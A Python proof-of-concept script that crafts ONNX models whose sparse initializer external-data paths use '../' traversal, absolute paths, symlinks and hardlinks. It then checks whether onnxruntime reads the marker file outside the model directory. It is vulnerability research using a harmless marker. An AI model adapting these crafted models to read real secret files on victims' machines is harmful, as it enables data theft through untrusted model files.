from __future__ import annotations import hashlib import os import shutil import subprocess import sys from pathlib import Path import numpy as np import onnx import onnxruntime as ort from onnx import TensorProto, helper, numpy_helper ROOT = Path(__file__).resolve().parent MODEL_DIR = ROOT / "model_dir" OUTSIDE_DIR = ROOT / "outside_dir" MARKER = b"ORT_SPARSE_INITIALIZER_EXT_READ" def sha256(path: Path) -> str: return hashlib.sha256(path.read_bytes()).hexdigest() def make_external_values(location: str) -> TensorProto: values = TensorProto() values.name = "sparse_init" values.data_type = TensorProto.UINT8 values.dims.append(len(MARKER)) values.data_location = TensorProto.EXTERNAL values.external_data.add(key="location", value=location) values.external_data.add(key="offset", value="0") values.external_data.add(key="length", value=str(len(MARKER))) return values def make_model(model_path: Path, location: str) -> None: values = make_external_values(location) indices_array = np.arange(len(MARKER), dtype=np.int64).reshape(len(MARKER), 1) indices = numpy_helper.from_array(indices_array, name="sparse_indices") sparse = helper.make_sparse_tensor(values, indices, [len(MARKER)]) output = helper.make_tensor_value_info("out", TensorProto.UINT8, [len(MARKER)]) identity_node = helper.make_node("Identity", inputs=["sparse_init"], outputs=["out"]) graph = helper.make_graph( nodes=[identity_node], name="sparse_initializer_external", inputs=[], outputs=[output], sparse_initializer=[sparse], ) model = helper.make_model( graph, producer_name="onnx-ort-sparse-initializer-external-poc", opset_imports=[helper.make_opsetid("", 18)], ) model.ir_version = 10 onnx.save_model(model, model_path) def build_cases() -> dict[str, Path]: for path in (MODEL_DIR, OUTSIDE_DIR): if path.exists(): shutil.rmtree(path) path.mkdir(parents=True) outside_marker = OUTSIDE_DIR / "marker.bin" outside_marker.write_bytes(MARKER) (MODEL_DIR / "inside.bin").write_bytes(MARKER) os.symlink("../outside_dir", MODEL_DIR / "link_parent", target_is_directory=True) os.link(outside_marker, MODEL_DIR / "hardlink.bin") cases = { "inside_regular": "inside.bin", "dotdot_escape": "../outside_dir/marker.bin", "absolute_escape": str(outside_marker.resolve()), "parent_symlink_escape": "link_parent/marker.bin", "hardlink_escape": "hardlink.bin", } paths: dict[str, Path] = {} for name, location in cases.items(): path = MODEL_DIR / f"{name}.onnx" make_model(path, location) paths[name] = path return paths def run(code: str, cwd: Path, *args: Path | str) -> subprocess.CompletedProcess[str]: return subprocess.run( [sys.executable, "-c", code, *map(str, args)], cwd=cwd, text=True, capture_output=True, check=False, timeout=30, ) def emit(name: str, result: subprocess.CompletedProcess[str]) -> None: stdout = result.stdout.strip().replace("\n", " | ") stderr = result.stderr.strip().replace("\n", " | ") print(f"{name}_rc={result.returncode}") print(f"{name}_stdout={stdout}") print(f"{name}_stderr={stderr}") def main() -> int: paths = build_cases() outside_marker = OUTSIDE_DIR / "marker.bin" print(f"python={sys.version.split()[0]}") print(f"onnx={onnx.__version__}") print(f"onnxruntime={ort.__version__}") print(f"case_dir={ROOT}") print(f"outside_marker={outside_marker}") print(f"outside_marker_sha256={sha256(outside_marker)}") print(f"hardlink_count={os.stat(MODEL_DIR / 'hardlink.bin').st_nlink}") print(f"hardlink_same_inode={os.stat(MODEL_DIR / 'hardlink.bin').st_ino == os.stat(outside_marker).st_ino}") checker_code = """ import onnx, sys onnx.checker.check_model(sys.argv[1]) print("checker_ok") """ onnx_load_code = """ import onnx, sys model = onnx.load(sys.argv[1]) print("load_ok") """ ort_code = """ import onnxruntime as ort, sys sess = ort.InferenceSession(sys.argv[1], providers=["CPUExecutionProvider"]) out = sess.run(None, {})[0] print(bytes(out.tolist()).decode("ascii", errors="replace")) """ ort_bytes_code = """ import onnxruntime as ort, sys so = ort.SessionOptions() so.add_session_config_entry("session.model_external_initializers_file_folder_path", sys.argv[2]) data = open(sys.argv[1], "rb").read() sess = ort.InferenceSession(data, so, providers=["CPUExecutionProvider"]) out = sess.run(None, {})[0] print(bytes(out.tolist()).decode("ascii", errors="replace")) """ hits: list[str] = [] for name, path in paths.items(): print(f"{name}:model={path}") print(f"{name}:model_sha256={sha256(path)}") for label, code, cwd, args in [ ("onnx_checker", checker_code, MODEL_DIR, [path.name]), ("onnx_load", onnx_load_code, MODEL_DIR, [path.name]), ("ort_file_relative", ort_code, MODEL_DIR, [path.name]), ("ort_file_absolute", ort_code, ROOT, [path]), ("ort_bytes_with_folder", ort_bytes_code, ROOT, [path, MODEL_DIR]), ]: result = run(code, cwd, *args) emit(f"{name}_{label}", result) if name != "inside_regular" and label.startswith("ort_") and result.returncode == 0 and MARKER.decode("ascii") in result.stdout: hits.append(f"{name}:{label}") if hits: print(f"impact=sparse_initializer_external_data_bypass:{','.join(hits)}") return 0 print("impact=no_sparse_initializer_external_data_bypass") return 1 if __name__ == "__main__": raise SystemExit(main())